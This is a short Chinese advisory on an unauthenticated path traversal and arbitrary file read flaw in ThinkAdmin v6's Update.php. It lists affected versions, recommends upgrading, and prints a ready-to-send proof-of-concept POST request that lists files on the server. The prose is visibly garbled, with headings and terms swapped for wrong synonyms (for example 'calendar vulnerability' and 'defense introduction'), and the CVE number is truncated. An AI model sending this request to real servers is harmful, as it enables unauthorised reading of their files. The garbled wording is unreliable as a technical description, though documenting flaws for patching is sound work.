Thinkadmin v6任意文件读取漏洞 (CVE-2020-

0x00：防御简介：

    ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统，ThinkAdmin的权限管理基于标准RBAC简化而来，去除了繁杂杂物的中断管理，允许权限管理更简单，具体包含了管理，权限管理，菜单管理，用户管理。

    ThinkAdmin 6版本存在路径遍历日历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意重新读取远程服务器上的文件。

0x01缺点成因：

https://github.com/zoujingli/ThinkAdmin/blob/v6/app/admin/controller/api/Update.php

Update.php中的函数方法未授权，可直接函数可直接调用。导致突破产生。

0x02影响范围：

Thinkadmin版本小于≤2020.08.03.01

0x03进攻复现：

POC：POST /admin.html?s=admin/api.Update/node HTTP/1.1Host: 127.0.0.1Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 22rules=%5B%22.%2F%22%5D

0x04修复建议：

    升级最新版本